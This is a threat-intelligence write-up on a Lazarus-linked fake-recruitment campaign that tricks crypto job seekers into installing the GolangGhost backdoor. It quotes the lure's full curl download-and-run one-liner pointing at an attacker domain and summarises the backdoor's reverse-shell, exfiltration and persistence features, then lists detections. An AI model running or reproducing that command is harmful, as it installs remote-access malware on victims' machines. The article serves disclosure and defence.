A newly observed social engineering wave tied to the Lazarus constellation is exploiting the seasonal rush for remote cryptocurrency jobs.
Dubbed “ClickFix”, the lure refines the earlier ClickFake Interview playbook by introducing a new repair-tool twist that incorporates a bespoke Go backdoor, which the Sekoia TDR team calls GolangGhost.
The result is a streamlined infection chain that blends convincing human-resources pretexting with a one-command shell payload, lowering barriers for non-technical marks and widening Lazarus’ reach into cryptocurrency-centric firms.
How ClickFix Upgrades the ClickFake Interview Ruse
The campaign still begins with LinkedIn messages or recruitment-themed emails that invite candidates to a “recorded video introduction” portal hosted on a look-alike domain (e.g., waventic.com).
Once the visitor grants minimal browser permissions, a pop-up appears, claiming “Access to your camera or microphone is currently blocked” and blaming a “race condition in the Linux camera driver cache.” The screen then walks the user through three steps:
- Open a terminal.
- verify
curl, - Run a one-liner:
bashcurl -k -o /var/tmp/mediadriver.sh https://support.waventic.com/mediadrivers-linux.sh && \
chmod +x /var/tmp/mediadriver.sh && \
nohup bash /var/tmp/mediadriver.sh >/dev/null 2>&1 &
This single command silently downloads the ClickFix helper script. Compared to Lazarus’ 2023 ContagiousInterview builds, which relied on macro-enabled DOCX or ISO images, the shell-script delivery removes file-opening friction, evades many attachment filters, and inherits the trust users place in legitimate troubleshooting snippets.
Under the Hood – The GolangGhost Backdoor
mediadriver.sh ultimately drops an ELF executable compiled with Go 1.22, internally branded “ghost”. Technical analysis of recent hashes shows:
- Dynamic C2 resolution via DNS TXT records, defaulting to port 443 over genuine-looking CDN sub-domains.
- Persistence through a systemd service named
video-helper.service, auto-starting with themulti-user.target. - Modular tasking: screenshot capture, clipboard exfiltration, bcrypt-encrypted file theft, and an interactive reverse shell.
- RC4-like stream cipher for traffic with hard-coded 32-byte keys reused across samples, easing signature-based detection.
GolangGhost’s Go runtime, static linking, and stripped symbols inflate the binary size (~7 MB), but also enable the malware to run unmodified across most 64-bit Linux distributions, a crucial trait for targeting developer workstations in blockchain firms.
Defensive Measures for Security Teams
- Block outbound
curl/wgetfrom browsers or unknown terminals and monitor long-livedbashchildren of browser processes. - Flag systemd services created outside package managers, especially those referencing
/tmpor/var/tmp. - Inspect DNS TXT look-ups followed by TLS sessions to unfamiliar CDNs; GolangGhost’s beacon interval defaults to 5 minutes.
- Amplify user awareness: job applicants should never install “driver fixes.” Legitimate recruiters will adapt to the candidate’s environment, rather than vice versa.
The ClickFix variant demonstrates Lazarus’ rapid iteration: shaving steps off the social-engineering funnel while adopting Go tooling that complicates static analysis.
With the crypto sector entering another volatile summer, organizations should strengthen endpoint egress controls and enhance user education to prevent the heat from escalating into a breach.
